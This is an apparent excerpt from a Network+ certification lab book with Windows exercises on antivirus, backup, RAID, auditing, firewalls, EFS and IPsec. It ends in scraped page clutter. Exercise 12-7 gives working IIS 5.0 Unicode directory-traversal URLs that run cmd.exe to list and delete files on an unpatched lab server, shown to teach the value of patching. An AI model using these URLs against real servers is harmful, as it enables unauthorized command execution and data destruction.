8. Double-click the Norton AntiVirus 2003 icon on the desktop to start Norton AntiVirus.
9. Click Next on the Welcome screen.
10. Select I Accept to agree to the license agreement and then click Next.
11. Select Skip on the registration.
12. Click Yes that you are sure you wish to skip registration.
13. Click Next to accept your 60-day complimentary service.
14. Turn off all tasks by unchecking the check boxes so that the automatic scan and live update
will not be performed for you. In the real world, you would do these right away, but for this
exercise you want to invoke them manually. Click Next.
- 120 -
Glen E. Clarke
15. Click Finish.

Updating Virus Definition Files
16. To update the virus definition files after the installation, click the Live Update link in the
top-left corner of the screen.
17. Click Next. LiveUpdate will connect to the live update servers and download any new virus
definitions.
Configuring Autoprotection and Scheduling a Regular Virus Scan
18. To configure Norton AntiVirus, click the Options link located at the top-left corner of the
Norton screen.
19. The Norton AntiVirus Options dialog box appears. To allow Norton to scan files as they are
accessed, make sure that the Enable Auto-Protect option is on. You may also specify that
you wish to have auto-protect enabled when Windows starts.
20. To allow Norton to scan e-mails before they are sent out, click the Email link on the left.
21. To scan outgoing and incoming e-mails, make sure that both options are selected at the top of
the Email Scanning options. You may also specify what action is to be taken if a virus is
found. For example, you could have Norton attempt to clean the virus or prompt you for an
action.
22. If you would like to configure LiveUpdate to run automatically, select the Live Update link
on the left side and then choose the Enable Automatic Live Update option.
23. Click OK in the Norton Option dialog box.
24. To do a manual virus scan, click the Scan For Viruses link on the left , then click Scan My
Computer.
25. The virus scan starts scanning your system. When it is completed, close the Scan window.
Scheduling a Scan
26. To schedule a scan to run at 12 A.M. every second night, click the Schedule link in the
bottom-right corner of the Norton AntiVirus screen.
- 121 -
Glen E. Clarke
27. Click New to create a new schedule.

28. In the Schedule Scan dialog box, set the Start Time of the scan to 12 am and the Perform
This Task to every two days.
29. Click OK. You should see a calendar icon located on the Scan My Computer task showing
that it has a schedule associated with it.
- 122 -
Glen E. Clarke
Exercise 11-3
Installing and Configuring Windows Defender
In this exercise, you will download and install Microsoft Windows Defender and then
configure the software and perform a scan.
Downloading and Installing Windows Defender
1. Start Internet Explorer and navigate towww.microsoft.com/downloads.
2. Type windows defender in the search box located at the top of your screen.
3. Click the Windows Defender link in the result list.
4. Click Continue.
5. Click Download to download the software.
6. Choose Save and save the file to c:\labfiles\tools.
7. Once the download is complete, close all windows and go to c:\labfiles\tools through
Windows Explorer. Double-click the file called WindowsDefender.msi to install the
software.
8. When the welcome screen appears for the Windows Defender software, click Next.
9. To validate your copy of Windows, click Validate.
10. Select I Accept the terms in the license agreement and then click Next.
11. Choose Ask Me Later when asked about the Spynet community.
12. Choose Next to do a complete installation.
13. Click Install to perform the install.
14. Once the application completes the installation, clear the check box stating to do an update
and scan and then click Finish.
Running the Windows Defender Software
15. You can launch the Windows Defender software at any time from your Start menu. If it is not
running, start it now.
- 123 -
Glen E. Clarke
16. Once it starts, you will notice at the top of the screen a Tools menu. Choose it and then click
Options.
17. In the options, notice that you can schedule a scan. Change the time to 12:00 AM.
18. Change the default actions to Remove to remove spyware when it is found.
19. Choose the Save button at the bottom of the dialog box.
20. Choose the Tools link again and then click the Software Explorer. The Software Explorer
will show you programs running in memory that you can then remove. At the top of the
screen you have a category that is currently showing Startup Programs. If you want to see
programs in memory, choose Currently Running Programs from the drop-down list. You
can then select a program from the list and choose End Process. Dont forget to make sure it
is not a program that will run at startup as well by checking the Startup Programs category.
21. When you are ready to do a scan on your system, choose the Scan option at the top of the
screen and a scan starts. After the scan completes, close Windows Defender.
- 124 -
Glen E. Clarke
Exercise 11-4
Backing Up and Restoring Data on Windows Server 2003
In this exercise, you will learn how to back up files on your Windows Server 2003 using
the Windows backup software, and how to restore a file after it has been accidentally deleted.
1. Select Start | All Programs | Accessories | System Tools | Backup.
2. To do a backup of the labfiles\packetcaptures folder, select the Backup tab. The backup
software shows you a list of files on the server you can back up.
3. Expand out the C drive and then the labfiles folder. Select the check box located beside the
PacketCaptures folder to back up the PacketCaptures folder.
4. At the bottom of the backup screen, change the path of where the files will be backed up to
c:\backup.bkf and then click Start Backup.
5. The backup job information displays. Click Advanced to verify that the backup type is a
Normal backup (which is also known as a full backup).
6. In the Advanced Backup Options you can set your backup type from Normal to Incremental
or Differential. Ensure that Normal is selected and then choose OK.
7. You could schedule the backup to occur automatically at certain times by clicking Schedule.
You will perform the backup manually, so click Start Backup.
8. When the backup completes, it will show a summary. Click Close.
Performing a Restore of a Deleted File
9. Double-click My Computer | Drive C | labfiles | PacketCaptures.
10. In the PacketCaptures folder delete the file named httptraffic.cap by right-clicking the file
and choosing Delete.
11. Click Yes to confirm you wish to delete.
13. To restore the deleted file, choose Start | Programs | Accessories | System Tools | Backup.
- 125 -
Glen E. Clarke
14. Choose the Restore tab.

15. Expand the File option on the left by clicking the + sign.
16. Expand the media option and then the folder for drive C by clicking the + sign as well. When
a dialog box appears asking the path to the backup file, simply click OK.
17. After the catalog is read (a catalog is a list of contents that exist in the backup set or tape), the
labfiles folder is displayed. Expand the labfiles folder on the left and then highlight the
PacketCaptures folder. Choose the check box located beside httptraffic.cap to restore that
file.
18. Click Start Restore.
19. Click OK.
20. Click OK on the second dialog box.
21. After the restore operation completes, click Close and then close the backup software. Verify
that the httptraffic.cap file now exist in C:\labfiles\PacketCaptures.
- 126 -
Glen E. Clarke
Exercise 11-5
Configuring RAID 0 in 2003 Server
In this exercise, you will create a striped volume in Windows Server 2003 using three
drives. Windows Server 2003 offers a software RAID feature, which means that the operating
system is responsible for the creation and management of the RAID volume. A hardware RAID
solution would offer a better performing solution, but it would be more expensive.
Converting a Disk to a Dynamic Disk
Before you can start creating fault-tolerant volumes, you must be sure to upgrade your
disk in Windows Server 2003 to a dynamic disk. Take the following steps to convert your disk
from a basic disk (which does not support RAID volumes) to a dynamic disk.
1. Right-click My Computer and choose Manage.
2. In the Computer Management console, select Disk Management on the left-hand side.
3. Right-click your disk 1 on the right side and choose Upgrade To Dynamic Disk.
4. The Upgrade To Dynamic Disk dialog box appears, asking you to select which disk you want
to make dynamic. Choosing disks 1, 2, and 3 in order to convert those drives from Basic
disks to Dynamic disks.
5. Click OK.
6. Click Upgrade.
7. Click Yes.
8. Click Yes again.
9. Click OK. You will need to reboot the system.
Creating a Striped Volume
10. After the system has rebooted, log on as an administrative account, choose No to restarting
again, and then start Disk Management.
11. Right-click an area of unallocated space on disk 1 and choose Create Volume.
- 127 -
Glen E. Clarke
12. The Create Volume Wizard appears. Click Next.

13. Choose the volume type of Striped Volume, which is the volume type you want to create,
and choose Next.
14. You will now need to choose the disks that will participate in the striped volume solution.
Select disks 2 and 3 on the left and click Add to add to the striped volume. Notice that the
disk you started the volume on was already selected as a member of the volume.
15. Once you have added each disk, at the bottom of the dialog box type the amount of space you
want to use on each disk for the volume. Type 200 and notice that each disk will use 200
for a total of 600MB for the entire volume.
16. Click Next.
17. Assign a drive letter of S for Striped.
18. Click Next.
19. Click Next to format for NTFS.
20. Click Finish and the new Striped Volume is created. Notice that drive S shows multiple
times because it is made up of multiple disks.
- 128 -
Glen E. Clarke
Exercise 11-6
Creating a Mirrored Volume in Windows Server 2003
In this exercise, you will create a mirrored volume in Windows Server 2003 using two of
the dynamic disks created in the preceding exercise. Remember that a mirrored volume stores all
the data on both members (disks) in the volume.
4. Choose the volume type of Mirrored Volume, which is the volume type you wish to create,
and choose Next.
5. Add disk 2 as a selected disk for the mirrored volume and type 200 MB as the total amount
of space used on each disk. Also notice that the total space used by the volume is 200MB as
well. Although there is 200MB per disk, you can store only 200MB totalthe other 200MB
is to store a copy of the data in case of disaster.
6. Click Next.
7. Assign drive M as the drive letter and choose Next.
8. Choose Next to format for NTFS.
9. Choose Finish. The mirrored volume is created. Notice that the legend in disk management
displays the color codes for each volume type.
- 129 -
Glen E. Clarke
Exercise 11-7
Creating a RAID 5 Volume with Windows Server 2003
In this exercise, you will create a RAID 5 volume in Windows Server 2003 using three
drives. Remember that a RAID 5 volume is similar to a striped volume but also stores redundant
information for each stripe that is written.
4. Choose the volume type of RAID 5 Volume, which is the volume type you wish to create,
and choose Next.
5. You will now need to choose the disks that will participate in the RAID 5 volume solution.
Select disks 2 and 3 on the left and click Add to add to the RAID 5 volume. Notice that the
disk you started the volume on was already selected as a member of the volume.
6. Once you have added each disk, at the bottom of the dialog box type the amount of space you
want to use on each disk for the volume. Type 200 and notice that each disk will use
200MBfor a total of 400MB for the entire volume, because a third of the space is used for
parity and is not actual usable space.
7. Click Next.
8. Assign a drive letter R for RAID 5 Volume.
9. Click Next.
10. Click Next to format for NTFS.
11. Click Finish; the new RAID 5 Volume has been created. Notice that drive R shows multiple
times because it is made up of multiple disks.
- 130 -
Glen E. Clarke
Exercise 11-8
Understanding RAID Types
In this exercise, you will read the description and then indicate what RAID type is being
described. You can check your answers at the end of the exercise.
Description
RAID Type
I am a volume that splits the data across each disk, but

I do not store any redundant data. What level RAID
volume am I?
I duplicate data across two drives. What RAID level

am I?
I have two hard drive controllers and a drive on each

hard drive controller. I am duplicating data across both
drives. What type of RAID 1 solution am I?
I am a RAID volume that stripes the data but also

creates fault tolerance. What RAID level am I?
I am a RAID level 1 solution that has only one

controller. What type of RAID 1 solution am I?
The following are the answers you should have come up with.
Description
RAID Type
- 131 -
I am a volume that splits the data across each disk but I
Glen E. Clarke
RAID level 0
do not store any redundant data. What level RAID

volume am I?
I duplicate data across two drives. What RAID level
RAID level 1
am I?
I have two hard drive controllers and a drive on each
Disk duplexing
hard drive controller. I am duplicating data across both

drives. What type of RAID 1 solution am I?
I am a RAID volume that stripes the data but also
RAID level 5
creates fault tolerance. What RAID level am I?
I am a RAID level 1 solution that has only one
Disk mirroring
controller. What type of RAID 1 solution am I?
- 132 -
Glen E. Clarke
Exercise 12-1
Setting Permissions on Registry Keys
In this exercise, you will log on to Windows XP as a user named Bob, who does not have
access to modify the Registry. You will subsequently log on as a network administrator and
configure Registry permissions so that Bob can modify the contents of the run area of the
Registry. Keep in mind that you normally would not allow users to modify the Registry and this
part of the exercise is simply for demonstration purposes.
1. Log on to Windows XP as Bob with a password of password. If you do not have a bob
account, you must create one.
2. Select Start | Run and type regedt32, and press ENTER.
3. In regedt32, navigate to
Hkey_Local_Machine\Software\Microsoft\Windows\CurrentVersion\Run.
4. Right-click the Run folder, and choose New | String Value.
5. An error message should display, because Bob does not have permission to modify the
Registry.
6. Log off Windows.
7. Log on to Windows XP as an administrator account.
10. Right-click the Run folder, and choose Permissions.
11. In the Permissions dialog box, select the users entry and assign the full control permission.
This allows Bob to create an entry only in the Run portion of the Registry.
12. Click OK.
13. Log off as administrator.
14. Log on to Windows XP as Bob with a password of password.
- 133 -
Glen E. Clarke
17. Right-click the Run folder and choose New | String Value.
18. Type test and press ENTER. You should be able to create the entry this time, because users
were assigned full control of the run portion of the Registry. Again, this is not a typical
practice, but you now know how to modify permissions on areas of the Registry.
- 134 -
Glen E. Clarke
Exercise 12-2
Assigning User Rights in Windows XP
In this exercise, you will log on as Bob and try to change the system time. Because Bob is
a user of the system and not a network administrator, he will be unable to change the system
time. You will subsequently log on to the Windows XP system as the administrator and assign
Bob the Change System Time right.
1. Log on to Windows XP as Bob with a password of password. If you do not have a bob
account, you will need to create one.
2. Double-click the clock in the bottom-right corner to change the system time. An error should
appear telling you dont have the privilege of changing the system time. This is because Bob
does not have the Change System Time right in Windows XP.
3. Log off as Bob, and then log on as the Administrator.
4. Select Start | Control Panel | Performance and Maintenance | Administrative Tools.
5. Double-click the Local Security Policy to change the system rights.
6. Expand Local Policies and select User Rights Assignments.
7. Double-click the Change System Time right and make a note in the space provided of the
individuals who can change the system time by default:
______________________________________________________________
8. Click Add User to Group and type Bob; then click OK.
9. Click OK.
10. Log off as Administrator and log on as Bob. Once logged on as Bob, you should be able to
change the system time by double-clicking the clock in the bottom-right corner.
- 135 -
Glen E. Clarke
Exercise 12-3
Configuring Auditing
In this exercise, you will enable auditing on a Windows Server 2003 Domain Controller
to monitor logon failures from a client system.
Configuring Auditing on Windows 2000/2003 Domain Controllers
1. Log on as the Administrator at your domain controller (2003ServerA).
2. Select Start | Administrative Tools | Domain Controller Security Policy.
3. Expand Local Policies and select Audit Policy. You will create the audit policy shown in the
following table. Notice that three events have been enabled for auditing.
Event
Success or Failure
Account Logon
Failure
Account Management
Success
Object Access
Success and Failure
4. To enable the audit policy, double-click each of the three events and select either success or
failure to match the preceding screen. For example, to audit the failure of an account logon,
double-click Account Logon and choose Define These Policy Settings and choose Failure.
5. Once you have enabled auditing on the three events, close the Domain Controller Security
Policy console.
6. Go to a command prompt by choosing Start | Run and then type cmd. At the command
prompt, type gpupdate to force the group policy change to update on the system.
7. Log out.
8. Once logged out, try to log on as the administrator with an incorrect password.
9. Log on as the administrator with the correct password.
10. Choose Start | Administrative Tools | Event Viewer.
- 136 -
Glen E. Clarke
11. Select the Security Log on the left, and look for a failure to log on as shown with the lock
icon.
12. Double-click the failure to log on event to view the username that was attempted and retrieve
the IP address of the system the person attempted the logon from..
13. Record the following information about the logon attempt:
Date: ___________________
Time: ___________________
Logon Username Tried: ________________________
Client IP Address: __________________________
- 137 -
Glen E. Clarke
Exercise 12-4
Enabling a Windows XP/Windows Server 2003 Firewall
In this exercise, you will enable the firewall feature on Windows 2003 to block all traffic
with the exception of allowing clients to reach the web server that you are hosting and to allow
clients to terminal into your server.
Determining Ports to Open
In this part of the exercise, you will determine which ports are used by services such as
web servers and terminal servers so that you can open those ports on your firewall once it is
enabled.
1. First plan which ports will need to be opened on the firewall by filling in the following table.
Service
Port
Protocol (TCP/UDP)
HTTP
SMTP
FTP
Remote Desktop
2. Once you have determined the three ports that will be enabled, on your 2003SERVERA
system select Start | Control Panel | Network Connections, and right-click your Local
Area Connection, and choose Properties.
3. Click the Advanced page.
4. On the Advanced tab, enable the Protect my computer and network... check box to
enable the Windows Server 2003 firewall.
5. Click the Settings button at the bottom of the dialog box.
- 138 -
Glen E. Clarke
6. In the Advance Settings dialog box you can specify which traffic you want to allow to pass
through the firewall by selecting the appropriate protocols. Select the check box beside Web
Server (HTTP).
7. Once you click the Web Server check box, the Service Settings dialog box appears. Notice
that port 80 is chosen at the bottom left of the dialog box and that TCP is selected bottom
right.
8. Click OK.
9. Select the check box beside the Remote Desktop service. The protocol information is
displayed. Notice that Remote Desktop (RDP) uses TCP 3389, and then click OK.
10. Select the check box beside Internet Mail Server (SMTP), and then click OK.
11. You should now have three services selected to allow traffic to pass through the firewall
check box.
12. Click OK twice.
- 139 -
Glen E. Clarke
Exercise 12-5
Encrypting Files with Windows XP
In this exercise, you will encrypt the contents of a file using EFS and allow Bob to
decrypt the file as well.
1. Go to the LabFiles folder on your XP system, right-click the file called CompanyLogo, and
choose Properties.
2. In the Properties of the file, click the Advanced button on the General page.
3. In the Advanced dialog box, select the check box next to the option to Encrypt Contents To
Secure Data.
4. Click OK.
5. Click Apply.
6. Choose Encrypt The File Only and then choose OK.
7. Click Advanced again and then click Details.
8. The Encryption Details dialog box appears. Notice that the user who can decrypt the file by
default is the person who has encrypted the file (at the top). You may add additional users to
the list by clicking Add so that they can decrypt the file as well.
9. Make a note of who the recovery agent is: ____________________________.
10. To view the certificate details for the person who can decrypt the file, click Add.
11. Click View Certificate.
12. Notice at the bottom that there is a valid date for the certificate of this userrecord the date
in the space provided:
_________________ to _________________.
13. Click the Detail page to view the certificate details.
14. Click OK five times.
- 140 -
Glen E. Clarke
Exercise 12-6
Configuring IPsec to Secure Network Traffic
In this lab, you will enable IPsec between the Windows XP client and Windows Server so
that hackers cant capture network traffic and view the data submitted between the XP client and
the server.
1. Before enabling IPsec, you may want to verify that you can capture data submitted into the
web site of the Windows Server from the Windows XP client.
2. On 2003SERVERA, start capturing network traffic with Network Monitor.
3. Go to the Windows XP client and type the address of the server in a web browser to access
the web site. In Windows XP, type a credit card number into the site and then click Submit.
4. Go to 2003SERVERA and stop capturing the network traffic; view the packet capture to
determine whether you can see the credit card number submitted. (Hint: look for the HTTP
Post Request.) Can you see the credit card number? __________
Note: The goal of this exercise is that after IPsec has been enabled, you will not be able to view
credit card information typed into the site.
Enabling IPsec on the Windows Server
5. To enable IPsec on the 2003SERVERA, select Start | Administrative Tools | Domain
Controller Security Policy.
6. In the Security Policy, select IP Security Policies.
7. Right-click Secure Server and choose Properties.
8. In the properties of the IPsec policy, click Edit to edit the default policy.
9. Choose the Authentication Methods page to set the encryption key used by IPsec. You will
notice that the default authentication method used by IPsec is Kerberos. Click Edit to change
the authentication method.
10. Select Use this string to protect the key exchange, and type the string mySecret.
- 141 -
Glen E. Clarke
11. Select OK twice.

12. Click Close.
13. Now that you have configured the IPsec policy with the encryption key, you will assign the
policy to the system, telling the system to use the policy. Right-click the Secure Server
policy and choose Assign.
14. When the policy is being used, it will have a little green diamond on it. When you wish to
stop using IPsec, you can unassign the policy by right-clicking it and choosing unassign.
Configuring Windows XP for IPsec
15. Now that the Windows Server has been configured for IPsec, you will configure the
Windows XP client for IPsec as well. This way any data sent between the Windows XP
client and the Windows Server will be encrypted. On the XPClient, select Start | All
Programs | Administrative Tools | Local Security Policy.
16. In the Local Security Policy, select IP Security Policies on Local Machine.
17. Right-click Secure Server and choose Properties.
18. In the properties of the IPsec policy, click Edit to edit the default policy.
19. Choose the Authentication Methods page to set the encryption key used by IPsec. You will
notice that the default authentication method used by IPsec is Kerberos. Click Edit to change
the authentication method.
20. Select Use this string to protect the key exchange, and type the string of mySecret.
21. Select OK twice.
22. Click Close.
23. Now that you have configured the IPsec policy with the encryption key, you will assign the
policy to the system, telling the system to use the policy. Right-click the Secure Server
policy and choose Assign.
24. Windows XP is now using IPsec. To verify that data is encrypted, capture the network traffic
from the Windows XP client to the Windows server by using Network Monitor, submitting
the credit card number into the web site again. When you review the captured traffic notice
- 142 -
Glen E. Clarke
that you cannot tell which traffic is the HTTP traffic as opposed to other traffic because it is
all Encapsulated Security Payload (ESP) traffic, which is the encryption protocol used by
IPsec.
- 143 -
Glen E. Clarke
Exercise 12-7
Understanding the Importance of Patching a Server
In this exercise, you will view the contents of drive C on an IIS 5.0 server that has not
been patched, using the famous dot dot attack. You will then delete a file from drive C of the
web server through the URL of a web browser. The goal of this exercise is to demonstrate how
dangerous it is to not have up-to-date operating system patches on a server. This vulnerability in
IIS 5 would not exist on a patched IIS 5.0 web server.
Creating a File on the Windows 2000 Web Server
1. On the Windows 2000 unpatched server, double-click My Computer.
2. Double-click drive C to open drive C.
3. Choose File | New | Text Document.
4. Type secret as the filename and press ENTER.
5. You will need to know the IP address of your web server. Go to a command prompt, type
ipconfig, and record the IP address of your web server in the space provided:
_______________________
Performing the Dot Dot Attack from a Windows XP System
6. Start Internet Explorer on the Windows XP system.
7. Type the following URL to connect to your unpatched IIS 5.0 box to view the contents of the
web servers hard disk. The IP address of my server is 10.0.0.20if your IP address is
different, you will need to replace the IP address in the URL:
http://10.0.0.20/scripts/..%c0%af.../winnt/system32/cmd.exe?/c+dir+c:/
8. Notice that after pressing ENTER, you can see the contents of the hard drive of the IIS 5.0
Web server and the file named secret.txt. Now that you have used the dir command through
the URL, change the command to delete the c:\secret.txt file by changing the dir to a del
command:
http://10.0.0.20/scripts/..%c0%af.../winnt/system32/cmd.exe?/c+del+c:\secret.txt
- 144 -
Glen E. Clarke
9. You get a CGI script error, but the delete operation has been successful. If you change the
delete command back to the original command to do a dir, you will not see the secret.txt file
anymore because it has been deleted. You may need to refresh the page.
- 145 -
Glen E. Clarke
Exercise 12-8
Performing a Vulnerability Scan with Languard
In this exercise you will download, install, and run a security scanner known as
Languard. The security scanner will let you know which security best practices are not being
followed, such as patches missing or too many administrative accounts. Lets get started!
1. Download Languard fromwww.gfi.com.
2. To install Languard, double-click the executable you downloaded. The installation begins
with a welcome wizard.
3. Click Next.
4. Choose I Accept The License Agreement and then click Next.
5. Click Next.
6. Type the administrator password and confirm the password; then click Next.
7. Languard stores the collected data in a database of either MS Access or SQL Server. Select
MS Access and then choose Next.
8. Click Next on the Mail Settings screen.
9. Click Next to accept the default destination folder.
10. Click Next. Languard installs.
11. Click Finish. The Languard application starts up so that you can perform a vulnerability scan
on the network.
12. Click the New Scan button located at the top-left corner of the screen to perform a new
vulnerability scan of the network. The New Scan dialog box displays. You can perform a
scan on a single computer, a list of computer names, a domain, or multiple computers by IP
address range. Select Range Of Computers from the Scan Type drop-down list.
13. Type the beginning IP address of 10.0.0.1 and the ending IP address of 10.0.0.200. Or if you
are using a different IP range, use that range.
14. Click OK.
- 146 -
Glen E. Clarke
15. The scanning process starts. This will take some time, depending on the number of systems
you are scanning.
16. When the security scan completes, you will notice that you can see the IP address that was
reached (192.168.1.100) and that the machine is called SERVER100. Notice that you can
also see there are 9 shares, 8 users, and 13 NetBIOS names registered.
17. Select Users located under the 192.168.1.100 machine. You can expand each user account to
find information about each user.
18. Select NetBIOS Names in the middle and you will see the NetBIOS names registered by the
different services on the right.
19. Select Password Policy to view the password policy settings such as how long each
password needs to be, along with password history.
20. In the middle of the screen, scroll down and find your Windows 2000 Server that has not
been patched. In my example it is the system with the IP address 192.168.1.201. Once you
find the system, expand it and you will notice a Vulnerabilities folder. Select the
Vulnerabilities folder to see a list of the vulnerabilities and the patches that are missing.
21. Notice that on the right side of the preceding screen you can see information on the service
pack or update, including its release date and the URL at which that patch or update can be
found.
22. Spend a few minutes looking around at all of the systems, and then close Languard when you
are done.
- 147 -
Glen E. Clarke
Exercise 12-9
Understanding Security Terms
This exercise is a paper-based exercise to help with security terms. Fill in the following
table with the matching answer. Refer to Chapter 12 if you need assistance.
Question
Answer
Which encryption method is faster but less secure than

others?
I am the type of encryption that uses a pair of keys for

encryption and decryption. When a message is encrypted
with one key, it is decrypted with the other key. What type
of encryption am I?
Which method is similar to stream cipher but is more secure

and takes longer?
What is done to make encrypted data a specific length?
I am the type of encryption that uses the same key to encrypt

and decrypt the message. What type of encryption am I?
Which popular technology is used to encrypt traffic between

a web client and a web server and is popular on e-commerce
web sites?
What can be used to verify that a message sent from a

specific person is really from that person?
- 148 -
Glen E. Clarke
Which encryption technology is used to encrypt all IP

traffic?
Which wireless encryption method is used to encrypt

wireless traffic using a symmetric key that has been proven
to be crackable?
Which wireless standard uses RADIUS as an authentication

service to allow or deny wireless clients to the wireless
network?
Which VPN protocol uses MPPE to encrypt traffic in the

VPN tunnel?
The following are the answers you should have come up with.
Question
Answer
Which encryption method is faster but less secure than
Stream cipher functions at a
others?
faster speed but is less secure.
I am the type of encryption that uses a pair of keys for
Asymmetric.
encryption and decryption. When a message is encrypted

with one key, it is decrypted with the other key. What type
of encryption am I?
Which method is similar to stream cipher but is more secure
Block cipher encrypts a block
and takes longer?
of data at a time, not bit by bit
- 149 -
Glen E. Clarke
like stream cipher.
What is done to make encrypted data a specific length?
Padding.
I am the type of encryption that uses the same key to encrypt
Symmetric.
and decrypt the message. What type of encryption am I?
Which popular technology is used to encrypt traffic between
SSL.
a web client and a web server and is popular on e-commerce

web sites?
What can be used to verify that a message sent from a
Digital signatures.
specific person is really from that person?
Which encryption technology is used to encrypt all IP
IPsec.
traffic?
Which wireless encryption method is used to encrypt
WEP.
wireless traffic using a symmetric key that has been proven

to be crackable?
Which wireless standard uses RADIUS as an authentication
802.1x.
service to allow or deny wireless clients to the wireless

network?
Which VPN protocol uses MPPE to encrypt traffic in the
PPTP.
VPN tunnel?
- 150 -
Glen E. Clarke
Exercise 13-1
Using Device Manager
In this exercise, you will use Device Manager to verify that a device is functioning
properly. The exercise will walk you through the steps to verify your network card on a
Windows 2003 Server.
1. Go to Start, Right-click My Computer, and select Properties. The System Properties
window opens.
2. Select the Hardware tab.
3. Click Device Manager.
4. The Device Manager window opens and displays a listing of all major resource areas of the
PC that are configurable or require a device driver.
5. Choose the plus sign (+) next to the Network Adapters category so that you can see a list of
network cards on this server.
6. You will see a list of all of the devices that fall under the chosen category. Once the list is
dropped down, you will see a red X on any devices not functioning properly and a yellow
exclamation mark (!) that shows there is a minor issue with the device.
7. Double-click the device you would like to troubleshoot to open its Properties and see
information about the problem with the device.
8. Once you see the status of the device, you may close all windows and start to fix the
problem.
- 151 -
Glen E. Clarke
Exercise 13-2
Checking Event Logs
If you are having a problem with a Windows 2000/XP/2003 system, you can view one of
three logs, depending on the type of problem. This exercise will show you how to view the
system log for problems with the Windows Server 2003 network operating system.
1. Go to Start, right-click My Computer, and choose Manage.
2. Expand out Event Viewer by clicking the plus sign (+) to the left.
3. To view the system log, click System on the left side. You can see the contents of the system
log on the right-hand side. Note that there are errors (red X), warnings (yellow triangle), and
information (blue i) events.
4. To investigate a warning or error, double-click the entry to view the details.
5. A dialog box opens, and you will need to try to decipher the information presented. Notice
that you can see the date and time the event happened at the top of the dialog box, and you
can see an error message at the bottom of the dialog box.
6. Once you see the error message, you can close all the windows and start fixing the problem.
- 152 -
Glen E. Clarke
Exercise 13-3
Using System Monitor
In this exercise, you will use System Monitor to monitor the health of the CPU and
memory in Windows 2003 Server.
1. To start the Performance Console, choose Start | Administrative Tools | Performance.
2. System Monitor is selected on the left, and a few counters are added automatically. At the
bottom of the screen you will see three counters. Fill in the following table using information
from those counters.
Object
Counter
3. To delete the existing counters at the bottom of the screen, select each counter and choose
Delete on the keyboard. You will add the counters manually yourself.
4. To add a counter, click the + button on the toolbar at the top of the screen in System Monitor.
5. In the Add The Counter dialog box, click the Performance object drop-down list and choose
Memory as the object. Ensure that Pages/sec is the counter you are adding by having it
selected in the counter list.
6. Click Add. You should see some activity in the background while System Monitor starts
displaying the monitored information.
- 153 -
Glen E. Clarke
7. Lets add the % Processor Utilization so that you can be sure your processor is not being
overworked. Choose Processor as the object, and then select % Processor Time as the
counter.
8. Click Add to add the counter to System Monitor.
9. You have added two counters: the Pages/sec counter to monitor how much paging is
occurring on the system and the % Processor Time counter to view how much of the
processor is being used. Click Close to close the Add Counters dialog box.
10. Start up another program such as Outlook to see whether you get any activity in System
Monitor.
11. Close all applications.
- 154 -

Network + Lab Book

Caricato da

Informazioni sul documento

Titolo originale

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

Network + Lab Book

Caricato da

Copyright:

Formati disponibili

Network+ Certification Study Guide, 4th Edition

Network+ Certification Study Guide, 4th Edition 0071615385

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

DETERMINING THE NETWORK DEVICE TO USE ........................................................................................................35

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

SUBNETTING A CLASS C NETWORK.........................................................................................................................67

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

SETTING UP A VPN SERVER IN WINDOWS SERVER 2003 ........................................................................................92

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

IDENTIFYING BUILT-IN GROUPS ............................................................................................................................116

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

CONFIGURING IPSEC TO SECURE NETWORK TRAFFIC ............................................................................................141

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

Computer 2: Windows Server 2003

Lab Book 2009 McGraw-Hill

Operating System: Windows Server 2003

Network+ Certification Study Guide, 4th Edition 0071615385

Patch Level: None

Operating System: Windows XP

Computer 4: Windows 2000 Server

Operating System: Windows 2000 Server

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

Operating System: Linux Red Hat

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

How would you go about solving this problem?

Network+ Certification Study Guide, 4th Edition 0071615385

One possible solution is as follows:

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

Network Technology to Use

I want to have a network that runs at 10

I want to have a 1000 Mbps network that

As a network technician, I want to build a

I want to have a network that runs at 100

I want to build a network that runs at 10

Lab Book 2009 McGraw-Hill

Network+ Certification Study Guide, 4th Edition 0071615385

The following table identifies the answers you should have.

Network Technology to Use

I want to have a network that runs at 10

10BaseT, which uses CAT 3

Mbps, using a star topology and UTP

I want to have a 1000 Mbps network that

1000BaseTX (Gigabit Ethernet using

uses my existing CAT 5 cabling. What

CAT 5 or CAT 5e)

type of network architecture should I use?

A Responsible for creating, managing, and ending a connection.